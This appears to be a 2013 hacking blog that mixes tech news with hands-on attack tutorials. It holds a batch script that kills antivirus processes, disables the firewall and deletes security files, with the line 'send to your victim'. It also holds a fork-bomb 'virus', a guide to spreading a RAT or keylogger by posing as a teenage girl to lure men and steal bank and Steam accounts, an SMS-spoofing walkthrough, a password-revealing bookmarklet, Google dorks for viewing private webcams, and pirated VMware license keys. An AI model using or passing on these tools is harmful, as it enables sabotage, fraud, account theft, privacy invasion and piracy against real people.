Monday, April 15, 2013

Microsoft Warns About Pitfalls Of Pirated Software

Aside from the fact that Microsoft loses money each time you purchase unlicensed software, there seems to be a pretty good argument against doing so. Not that you should need some convincing, right? After all, anyone who considers himself an upstanding citizen does not buy pirated software. Even if it’s Microsoft. Or maybe especially if it’s Microsoft.



Of course, what happens in the shadow does not always coincide with publicly made statements, and based on a study done by Microsoft, in Southeast Asia, the use of pirated software is still rampant. Worse, unlicensed software even comes with newly purchased computers. The study uncovered alarming details, not the least of which is that there are 5,601 types of malware to be found in laptops that come pre-installed with pirated Windows operating systems! (Source)
If you think that purchasing a branded laptop or desktop computer gives you an edge in terms of malware, don’t be so sure about that. Keshav Dhakad, Regional Director for Intellectual Property of Microsoft Asia Pacific and Japan, said in announcement:
“Many people assume that buying a name-brand PC is all that’s required to guarantee a good and safe computing experience. They don’t think about the software sold with the computer, and whether or not it’s pirated.”
While I am pretty sure consumers have a good idea whether the software that comes pre-installed is legit or not – just check the price! – it could be easy to turn a blind eye if you make considerable savings. However, with the results discovered by this study, the savings might just not be worth it at all.
The survey was conducted in Indonesia, Malaysia, Philippines, Thailand, and Vietnam in December last year. The subjects included laptops – branded – and DVD installers, a considerable percentage of which contained malware. And of all the malware found, majority were trojans.
Windows users are not strangers to security issues, but why increase the chances of encountering such by purchasing pirated software? You might argue that, naturally, the findings of the study would be beneficial to Microsoft in the sense that they will push for purchasing legit software. There is that, but you can hardly ignore this kind of threat for a few bucks saved, yes?
I would normally end with a statement along the lines of “just go Mac”, but we all know that system’s not all that immune anymore; so, whatever system you end up using, maybe it’s time to cough up a little more dough for security.

Saturday, April 13, 2013

Hacker can control aircraft system with Android Smartphone

A Security Researcher Hugo Teso at Hack In The Box security conference has demonstrated that it is possible for a hacker to take control of aircraft system with an android smartphone.








By hijacking a protocol used to send data to commercial aircraft and exploiting bugs in flight management software, a hacker can send radio signals to planes that would cause them to execute arbitrary commands such as changes in direction, altitude, speed, and the pilots’ displays.


"Teso demonstrated an Android application he built that allowed him to redirect a virtual plane with just a tap on a map application running on his Samsung Galaxy phone." Forbes report reads.

Teso told Forbes that he was able to use the exploit "to modify approximately everything related to the navigation of the plane that includes a lot of nasty things"

Teso notified Federal Aviation Administration and the European Aviation Safety Administration and they are working with the affected aerospace companies to fix the vulnerability.

The presentation can be found here : Aircraft hacking[PDF].

GigaByte Technology website Hacked and Defaced by TurkishAjan

4 Subdomains of GigaByte Technology website defaced by TurkishAjan

The TurkishAjan hacker group has defaced four sub-domains of Gigabyte Technology - a Taiwan-based manufacturer of computer hardware products best known for its motherboards.










They didn't mention any specific reason for the attack.  The defacement page reads "Hacked by  Hacked by TurkishAjan. Bazen birseyleri degistirmek gerekir. Sometimes must be something"

 The hackers also posted a download link of Gigabyte.rar file in their official twitter account along with the link to the zone-h.

"Gigabyte Hacked ! zone: http://goo.gl/UAbkt file: http://goo.gl/PbcuI #hack #news #gigabyte" The tweet reads.

Inside the rar file , there are xls files, Backup files and member.sql file. The member's database dump(member.sql) contains the employee full name, plain-text password, email address and other details.  The backup file dates to 2010 contains the website source code includes web-config file.

At the time of publishing the article, we are still able to see the defacement.  Here is the list of defaced sub-domains:

  • websys.gigabyte.com 
  • gcenter.gigabyte.com/index.html 
  • peripheral.psn.gigabyte.com/index.html
  • nbstk.gigabyte.com/index.htm   
Mirror of the defacement:
http://www.zone-h.org/archive/published=0/ip=210.80.76.62

Thursday, April 11, 2013

Mark Zuckerberg launches FWD.us political action group


Facebook CEO Mark Zuckerberg has launched a new political action group, FWD.us, to focus on immigration reform.



Zuckerberg, who announced the move through an editorial in The Washington Post, called U.S. immigration policy "strange" for a nation of immigrants and "unfit for today's world."
As a result, a deep roster of tech executives have banded to together to push a bipartisan policy agenda to change how the U.S. approaches immigration. The group has vowed to work with members of Congress from both parties, the administration, and state and local officials. It plans to use online and offline advocacy tools to build support for policy changes.
The leaders of FWD.us include: LinkedIn cofounder Reid Hoffman; Google Executive Chairman Eric Schmidt; Yahoo CEO Marissa Mayer; Dropbox CEO Drew Houston; angel investor Ron Conway; Chamath Palihapitiya of the Social+Capital Partnership VC fund; Joe Green, cofounder of the Causes Facebook app; Jim Breyer of the Accel Partners VC fund; Matt Cohler of the Benchmark VC fund; John Doerr and Mary Meeker of the Kleiner Perkins Caufield & Byers VC fund; Paul Graham, cofounder of the Y Combinator seed capital firm; PayPal cofounder Max Levchin; Aditya Agarwal, VP of engineering at Dropbox; and Ruchi Sanghvi, a former Facebook engineer who started a company later acquired by Dropbox.
Specifically, the group believes a few key things are needed:
  • Comprehensive immigration reform that begins with effective border security, allows a path to citizenship and lets us attract the most talented and hardest-working people, no matter where they were born.
  • Higher standards and accountability in schools, support for good teachers and a much greater focus on learning about science, technology, engineering and math.
  • Investment in breakthrough discoveries in scientific research and assurance that the benefits of the inventions belong to the public and not just to the few.
Many technology companies have been pushing for changes to the immigration policy, seeking fixes that would let foreign engineers and scientists remain in the U.S. post-graduation. They have been hoping for prompt action for a pair of bills introduced this year that would ease the shortage of skilled workers, in part by expanding the H-1B visa program. However, any changes have been stymied by the political mess known as comprehensive immigration reform.
Zuckerberg in his editorial noted that the economy of the last century was based on natural resources, industrial machines, and manual labor -- all areas with finite opportunities for wealth. But today's economy is based on knowledge and ideas, which are renewable and available to everyone, he said.
"Unlike oil fields, someone else knowing something doesn't prevent you from knowing it, too. In fact, the more people who know something, the better educated and trained we all are, the more productive we become, and the better off everyone in our nation can be."
To create a so-called knowledge economy, the U.S. needs the most talented and hardest-working people, and that means the U.S. needs to change its policy toward immigrants, Zuckerberg argued.

Apple eyes future devices with flexible displays


A recent job post and two new patent applications offer more clues that the company wants to develop devices with flexible displays.



A flexible-display iPhone or iWatch may be on Apple's to-do list after all.
The company has already shown interest in flexible devices by filing a few patent applications aimed in that direction. A recent job ad and still more patent filings provide further hints that the technology is on Apple's agenda.
A job ad posted by Apple on April 1 specifically said the company was looking for a display specialist to work with LCD, AMOLED, and flexible displays. The ad has since been taken down, but 9to5Mac captured a screenshot just in time, revealing the full description:
Apple Inc. is looking for a Display Specialist to lead the investigation on emerging display technologies such as high optical efficiency LCD, AMOLED and flexible display to improve overall display optical performance.
The ad further stated that it needs someone to "analyze the trade-offs between design, process, optical performance, and implementation feasibility."
Adding more fuel to the fire are two new patent applications, also uncovered by 9to5Mac.
Filed by Apple in September 2011 and published by U.S. Patent and Trademark Office on April 4, 2013, a patent application entitled "Flexible Electronic Devices" shows an image of a bended electronic device that looks like the iPhone. Apple describes the device outfitted with flexible components, including the display, housing, battery, and circuit board.
In one example, the device could be foldable so that the user can easily store it. Unfolding the device would then automatically turn it on or wake it up. In another example, the device would be twisted as a way to turn it on and off or perform other actions:
User interface components may be configured to initiate a response from the device to the detected twist such as turning the device on or off, entering active or standby mode, answering a cellular telephone call, starting a software application, changing a volume associated with audio or video playback of media, starting or stopping audio playback of media, etc.
A second patent application filed in September 2011 and published on March 28, 2013, is called "Electronic devices with sidewall displays." It points to a device with a flexible display that can be bent to show information and provide controls on both the front and side edges:
Edge displays may alternately function as virtual buttons, virtual switches, or informational displays that are supplemental to front side displays. Virtual buttons may include transparent button members, lenses, haptic feedback components, audio feedback components, or other components for providing feedback to a user when virtual buttons are activated.
Apple has been busy applying for patents over flexible displays.
A patent application filed in March 2012 described "Electronic devices with flexible displays."Another one filed in September 2011 envisioned an iPhone with a wrap-around display. And a third highlighted a flexible touch-screen device that could be worn around the wrist, a potential hint at the much-rumored iWatch.

No Microsoft Office for iOS, Android until fall 2014?


An alleged road map for Microsoft's coming Gemini wave of Office updates, if accurate, indicates Microsoft's Office for iOS and Android -- as well as Outlook for Windows RT -- might not happen as soon as many had hoped for and expected.
A source of mine shared what appears to me to be a real road map for Gemini.
It kicks off with Gemini wave 1.0, which includes the Blue metro-style/Windows Store complements to the core set of Office products -- namely, Word, Excel, PowerPoint, and OneNote. From what I've heard previously, these four apps will be more touch-centric and will work on Windows 8 and Windows RT. They will supplement, not replace, the desktop/Win32 versions of these apps that already exist. These apps will be made available to customers by October 2013, according to the purported road map.
The 1.5 wave of the Gemini updates is set for April 2014, the road map indicates. This is when the Office team will deliver the next version of Mac Office and an update to Office for Windows Phone. April 2014 also is listed as when Microsoft plans to make Office customized for LSX hardware. LSX offers a "large-screen experience," i.e., Perceptive Pixel large-screen, multitouch systems.
There's one other interesting projected milestone for April 2014: Office RT. I'm thinking this is a refresh of the desktop version of Word RT, Excel RT, PowerPoint RT, and OneNote RT -- the desktop versions of the current Office 2013 RT suite that Microsoft ported to ARM and bundled with Windows RT. I'm doubtful this will be other Office apps ported to Windows RT, even though one of my contacts claimed recently that the Office team already completed ports of most, if not all, of its Office apps to ARM.
One app that seemingly won't be part of the spring 2014 update, if this road map is real and accurate, is Outlook RT. It appears Microsoft may be holding back the Outlook RT application until the fall (October) of 2014 for some reason -- despite that this app is in the midst of being tested privately, both inside and outside Microsoft. I really hope this is wrong and that Microsoft has decided to speed up delivery of this one, given the Mail app on Windows RT is still nothing to write home about, even though Microsoft did make some needed improvements to the Windows 8/Windows RT Mail app in March.
Also on the road map for fall 2014 is what's listed as iOS/Android support for Office. One would assume this is the expected and widely rumored Office for iPad release. It could, however, be Office for iPhone and Android phones, given that it's not listed on the road map as being tablet-specific.
Rumors about Microsoft's plans to deliver Office for iOS and Android have been circulating for more than a year. Microsoft representatives have never outright denied these apps were in development. A number of us Microsoft watchers heard from our various sources that these apps were on track to be delivered by early- to mid-2013.
The most recent rumors/expectations have been that Microsoft may be making these mobile iOS/Android versions of Office available as part of an Office 365 subscription of some kind. The alleged road map makes no mention of an Office 365/subscription tie-in. It only mentions "iOS/Android" as a Gemini fall 2014 deliverable.
In sum, this is what the alleged road map indicates:
  • Gemini wave 1.0, October: Windows Blue app updates.
  • Gemini wave 1.5, April 2014: Office for Mac, Office RT refresh, Perceptive Pixel support, Windows Phone support refresh.
  • Gemini wave 2.0, October 2014: Outlook RT, Office for iOS/Android.
I do not know how old this purported road map is, but my contact indicated it was likely current as of the start of this year. I asked Microsoft Office to comment, but the company declined to do so.
"We don't have any information to share about the next set of updates to Office," a spokesperson said.
One last thing to keep in mind: Even when Microsoft commits to ship targets in road maps, things can and often do change. Demand (or lack thereof) can result in planned products releasing earlier or later than the planners anticipate.

Samsung goes Mega with two new Galaxy smartphones

On the left is the Samsung Galaxy Mega 6.3, and on the right, the Galaxy Mega 5.8.
(Credit: Samsung)

Samsung has unveiled two new smartphones that push the envelope of screen size in the smartphone space.
Dubbed Mega, the two devices Samsung showed off today come with the customer's choice of a 5.8-inch screen or a 6.3-inch option. Both devices come with Android 4.2 (Jelly Ben) and a dual-core processor. The higher-end 6.3-inch option comes with a 1.7GHz processor, while the 5.8-inch version has a 1.4GHz chip. Both handsets have 8-megapixel rear-facing cameras and 1.9-megapixel front-facing cameras.
Samsung's Mega 6.3 handset will deliver 8GB or 16GB of internal storage, with up to 64GB of capacity with the microSD slot. The smaller option comes with 8GB of storage.
Rumors had surfaced earlier this week that Samsung was planning to launch new hand sets that would boast ultra-large screens. Samsung at that time declined to comment on whether it was planning to launch such devices.
Although Samsung boasts about the Mega's thin design and software features, the real impact the devices will have is in the evaluation of screen sizes. To put their sizes into perspective, Apple's iPhone comes with a 4-inch screen. The latest Samsung Galaxy S4 has a 5-inch display.
But before you get too excited about the Megas, be aware that for now, Samsung is only promising that they will be made available in Europe and Russia starting this May. The company said that their availability will vary by market and they will be rolled out gradually over time.

Iran To Launch 'Islamic Google Earth'



Iran -- long irked by Google's mapping systems -- said that it will launch its own 3D mapping service, one liberated from the geographical inaccuracies and "Zionist" bent of Google Earth.
The system will be an "Islamic Google Earth," according to Mohammad Hassan Nami, Iran's minister for information and communications technology. It will go by the moniker "Basir," which means "spectator" in Farsi, and it reportedly will be ready for launch in the next four months.
Google Earth merely feigns providing a service, Nami said, but is actually used by security and intelligence organizations to obtain information from foreign countries.
What exactly will be different about the "Islamic" 3D map, Nami didn't say.
After Google Maps removed both "Persian Gulf" and "Arabian Gulf" last year in a bid to be politically neutral, Iran threatened to sue Google over its non-labeling of the Persian Gulf.
[Source: The Guardian]

Pirate Bay Finds No Haven in Greenland

The telecommunications company in charge of Greenland's ".gl" top-level domain followed through on threats that it would block domains related to The Pirate Bay, perhaps the world's best known file-sharing site.
The Pirate Bay was born in Sweden but is falling increasingly out of favor with Swedish authorities. Thus, earlier this week, The Pirate Bay abandoned its Swedish .se domain in favor of .gl.
However, Tele-Post, the company overseeing .gl registration, said it would not permit the domain to be used for "illegal" activities. Indeed, both Pirate Bay sites -- ThePirateBay.gl and PirateBay.gl -- have been suspended.
[Source: Torrent Freak]

US to Escalate Cyberdefense

President Obama on Wednesday proposed an increase in spending to guard U.S. computer networks.
Military "hackers" are part of Obama's budget proposal for the 2014 fiscal year, designed to strengthen U.S. efforts to fend off cyberthreats from China, Iran, Russia and others. The proposal would increase defense for both government and private computer networks, and increase the Defense Department's spending on cyberefforts to US$4.7 billion, up $800 million from current levels.
Last month, intelligence officials said that cyberattacks and espionage had usurped terrorism as the United States' top security threat.
[Source: Reuters]

ICANN Plans Chinese Character Options

The Internet Corporation for Assigned Names and Numbers, or ICANN, announced Wednesday that the organization would introduce Chinese character options for top-level domains during the second half of 2013.
ICANN, a private body that oversees top-level domains, among other things, had previously limited Web address endings to Roman characters -- hence, .com, .org, .net and so on. Chinese characters can already be used before the Web address suffix, but not in top-level domains.
Now that such top-level domains will indeed be allowed, ICANN has already received applications for Chinese characters such as "cell phone," "benevolence" and "company."

Google Sleaze View

Critics who bemoan Google Street View's privacy invasion just got some raunchy new ammo. (A heads up -- all ensuing links are not necessarily suitable for work.)
Google Street View's quest to map the world's roadways resulted in a rather unfortunate image showing two lovebirds, shall we say, expressing their love on the hood of their ride, which was parked along the Dukes Highway in southern Australia.
Now, there is reason to doubt the veracity of the image, which first popped up on Reddit. For one thing, the Dukes Highway is a major road, connecting Melbourne (Australia's No. 2 most populous city) and Adelaide (No. 5).
That said, the image -- which is not gratuitous but at the same time not particularly wholesome -- does suggest an intimate rendezvous.
Google Street View has also reportedly captured an image of a dead donkey -- one that some suspect was killed by the Street View vehicle.

Tuesday, April 9, 2013

How to REMOVE VIRUS URSELF:- 1) Goto Run>cmd. 2) Type “:” ­ in the command prompt and hit “Enter“. (“Drive_name” is where the problem occurs, it may be any USB drive) 3) Type “attrib” and hit “Enter“. (This shows the files that are present in the currently working directory. You can also use the command “dir/w/ o/a/p“) 4) If there are any file named autorun.inf or some .exe file that you are unaware then go for next steps else the drive is not affected with any autorun.inf file. 5) Type “attrib -h -r -s -a *.* ” then hit “Enter“. (This command removes the Hidden, Read Only, System and Archive attributes over any file) 6) After unhiding and removing attributes you can see the files. So you can delete the file now. 7) Type “del ” in the Command Prompt and hit “Enter“. 8) you can also rename the file by typing " rename autorun.inf aa"(aa is new name) to delete the file.

Thursday, April 4, 2013

FORK BOMB



Today we are going to show you how you can make your very own virus.
The FORK BOMB!

The Fork bomb consists of few short lines of code and today I'm going to show you the batch version.

First up you will need to open up notepad

Then copy the code below

:a
START %0
GOTO :a

And thats it! Now save the file as virus.bat or any other name and when you run it, It will start thousands of windows of command prompt and will continue doing so until the computer Freezes.

Once your computer freezes you will have to restart it.
This virus does not damage any files or the OS and it only causes the PC to crash.

Enjoy :D

Please correct a common mistake


friends 1Kbps is not 1KBps. There's
a a small difference of b which
makes a huge difference in MBps
and Mbps.
None the less many people do
confuse in these terms and do get
happy when they hear that their
internet speed is 1Mbps but actually
its 128KBps and complain after
wards 'That my speed is 1Mbps but
still it doesn't download a 4MB file
in 4 secs. :p
Kbps means Kilo'bits' per second
not Kilo'bytes' per second.
Since Bytes is a huge amount in
relation to networking so most
networkoperator s give the data
transfer in Kilo'bits' not Kilo'bytes'
while all the computer files exists in
bytes.
To convert bits to bytes divide that
databy 8 (since 1byte = 8bits). So
next time when you buy a modem
or get a connection do check the 'b'
and find out its real speed. :D

Wednesday, April 3, 2013

How to disable/delete your victim's Antivirus?



Here i am giving you the batch program to disable or delete the antivirus in victims computer.

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

Copy this code to notepad
Save it with .bat extension(for eg antdis.bat)
send to your victim.

Saturday, March 30, 2013

Thursday, March 21, 2013

Easy Way to Spread Your Virus (SOCIAL ENGINEERING):

Easy Way to Spread Your Virus (SOCIAL ENGINEERING)





Hey there. I'm going to tell you how to spread your RAT/Keylogger really effectively, you can have a direct age range, and get many things such as Bank Info & Steam accounts.

Step 1) Register a new MSN, with a girls name. This is vital because you want to attract men who will download things for you. It doesn't matter what name, just register one that sounds believable.

Step 2) Take a picture from one of your girl friends on FaceBook or Myspace or even just go on Google and find a picture of a girl, set this as your display picture on the new msn you created.

Step 3) Go to chatavenue.com, and go to "Teen Chat" here there are loads of sad lonely men who want to paedo girls for pictures, JACKPOT, usually these people have games and PayPal's on there accounts and will generally download shit.

Step 4) Post in the Chat. "16/F/US" or something like that, you will be BOMBARDED with PM's from men who want to talk. Just say to them your MSN you just created and you will get shit loads of adds on msn.

Step 5) On your MSN just say a copied and pasted message like the following.

"Hey, want to download these hot pics I just made? I'm sure you will like them "

Or something on that line, usually they download them. Make sure you hide your RAT or Keylogger as a .RAR file as in, it's an .EXE but with a WinRAR Icon and WinRAR info and such. Like HotPics1.rar.exe

I've had so many hits with this method, and I'm sure you will too.

Friday, March 15, 2013

Hacking Mobile Number Duplicate/Create And Send SMS

Hacking Mobile Number Duplicate/Create And Send SMS By It....
For Educational purpose only,,

This is my First post about mobile hacking,In this post,We are going to create any mobile number (police,fire department,girlfriends,etc) andsend messages,Sure this method has only 75% success rate,but it works like a charm for the most time.In spoofing attack the attacker (you) make himself a source or desire address.This post is only for education purposes,and this trick can be traced back to the source very easily,So don't create a scene.

So What Do WE Need : #SET - Social Engineering Toolkit, Available On Backtrack.

Step 1 :
Open "Social Engineering Toolkit" in Backtrack 5 (mine OS) by Opening your backtrack console &Typing cd/pentest/exploits/set

Step 2 : Once the directory is opened,Type"./set" to fire up the social attacking kit.

Step 3 :
Now select option number 7.This module allows you to specially craft SMS messages and send them to a person. You can spoof the SMS source if you want to,its not that hard.

Step 4 :
Now select option 1 "Perform a SMS Spoofing Attack”

Step 5 : Select how the "spoofed-sms" should distribute,you could send it to many people or just one,Yourchoice.

Step 6 :
Now you need to enter the number of the receiver (victim), make sure to enter with country code.Example : +9188260xxxxx for India.

Step 7 :
Now select 1 for pre-defined Templates,that is helpful to newbies, of- course you can createyour own.

Step 8 :
On this step you need to choose the templates,I will choose the"Boss" one,you can use accordingto your situation.

Step 9 :
Now you need to select the service which will send that crafted SMS you created,You can choose whatever-the- hell you want,If you have an Android Emulator that is just great.

Step 10 : Yeap ! You just send an spoofed message,which is capable of stopping war or creating it,depends on you.

How To View Hidden Password behind ****



Step 1.First of all open up the webpage on which
you wanna show the hidden passwords.

Step 2. Then in the username there must be the
name and in the password there must be ********

Step 3.Now to see the password which is behind the
******** Just copy and paste the following
JavaScript into the address bar of the browser and you are done.

javascript:(fun ­ction(){var%20s ­,F,j,f,i;%20s%2 ­0=
%20%22%22;
%20F%20=%20docu ­ment.forms;%20f ­or(j=0;
%20j<F.length;% ­20++j)
%20{%20f%20=%20 ­F[j];%20for%20( ­i=0;
%20i<f.length;% ­20++i)
%20{%20if%20(f[ ­i].type.toLower ­Case()%20==
%20%22password% ­22)
%20s%20+=%20f[i ­].value%20+%20% ­22\n%22;
%20}%20}%20if
%20(s)%20alert( ­%22Passwords%20 ­in%20forms
%20on%20this
%20page:\n\n%22 ­%20+%20s);%20el ­se%20alert
(%22There%20are
%20no%20passwor ­ds%20in%20forms ­%20on%20this
%20page.%22);}) ­();

Step 4. After copying and pasting the JavaScript
given above press the enter key and hidden
passwords will be shown to you.

VMware workstation

So here it comes info about VMware ! (as stated in previous article)

VMware workstation and Virtual box !

VMware workstation !
VMware is a software for windows platform which is capable of running number of machines at a time ! It serves the purpose of creating workstation !

So it can also be used to use other OS's at a time on the same platform !

its also used by hackers to test their own skills on hacking into a network. Its much in the same manner of real network but its virtual so no more cost !

Its as simple as just downloading the OS's .ISO file and loading it with VMware ! VMware is paid software but im giving here a crack for you !

VMware Workstation 9.0
vmware released the latest and the most famous virtual computing application VMware workstation on 23rd of August 2012.You may be still using vmware,not the workstation edition but the light edition of it ; VMware player. Well,If you want to know whats more in VMware workstation go on reading.
Whats New and More in VMware Workstation 9 ?
1.Windows 8 intergration
2.Graphics Improvements
3.OpenGL for Linux Guests
4.Restricted Virtual Machines
5.WSX
6.Downloading Virtual Machines from vSphere
7.USB 3.0
8.Nested Virtualization
9.Hyper-V
10.Virtual Performance Counters
11.Remoting Improvements
12.Disk Cleanup
13.Quick Switch II
14.Thumbnail Actions
15.Saved Filters

How it Works ?

VMware and all other Virtual PC applications are based on Virtualization technology.That let you run several operating systems together in one computer
Virtualization software solves the problem by enabling several operating systems and applications to run on one physical server or “host.” Each self-contained “virtual machine” is isolated from the others, and uses as much of the host’s computing resources as it requires.

About VMware workstation 9 !

VMware workstation 9 is a commercial program unlike VMplayer.You can evaluate the program only for 30 days if you are not willing to buy activation keys.So first you have to download the trial version setup for activating using the serials given.And also the workstation edition of VMware is a bit larger program of 425 Mb.
Note : You have to register on VMware web page to download the trial version of setup.If you don’t have a vmware account go to this page and register ! After downloading the setup read the instructions below to activate your copy of VMware for free

How to Activate ?

1.Launch the downloaded setup and wait till it loads

2.Continue the setup with your own options and install vmware

3.Right after the installation it will ask for a License key to activate full version

4.Just copy a key from below and paste in the box there

5.Click Enter ! That’s all launch VMware workstation 9 and see about ; its registered

VMware Workstation 9 Serials:

MY4T2-44HE5-0ZQ10-VU072-128J0
0F23V-4D38L-9ZQ38-2K37H-83C50
0F03K-80JEQ-8ZF89-8287H-A2R47
0A22R-400EM-EZ4W8-3K9NK-3AUPL
NA64Z-0V054-UZVC0-2L370-837K4

also
Virtual Box !
its same as VMware but it cant create workstation ,
though it cant it is much useful since its a freeware !

here is its official website !
Oracle VM VirtualBox
https://www.virtualbox.org/

How to Format a Pen Drives Using CMD, to Delete Viruses Permanently...

How to Format a Pen Drives Using
CMD,
to Delete Viruses Permanently...

So let's see how to format your pen
drive using command prompt.

Insert pen drive into your PC
Find the drive letter of the pen
drive

Now click on Start ---> Run
In run box, type cmd and hit Enter
Now command prompt will appear,
in this window type format "your
pen drive letter:"
For example type : format g:

Hit Enter twice
Wait for sometime until command
prompt verify the file system.

Now command prompt will ask you
to enter a drive name.

After that type the drive name and
then hit Enter again.

That's all, you have done !!!

How To Renew Your IP ADDRESS

How To Renew Your IP ADDRESS
Now get new IP Address for your computer. Just follow some steps and change it.

1) Goto Start -- Run.

2) In the Run box type cmd and press enter.

3) Now copy paste the below commands and press Enter after each line.

ipconfig/flushdns
ipconfig/release
ipconfig/renew
exit

4) Now clear your cookies and check ur IP, your pc is assigned with new IP.

===================
Victim_boY

Gain Access To Unprotected Webcams

>

Using GOOGLE
Hi guys, been a while since I posted something cool related tohacking.Today I am going to show you how to access unsecured live webcam using Google dorks. There are many Google dorks using that you can easily access live webcam. I will share some of the Google dorks with you
Follow the simple steps
1. Open Google.com
2. Search 

inurl:/view.index.shtml
3. Now open any result
And the live streaming should start........

Here I am posting more google dorks.
inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
Hope you guys like it.
Enjoy ^_^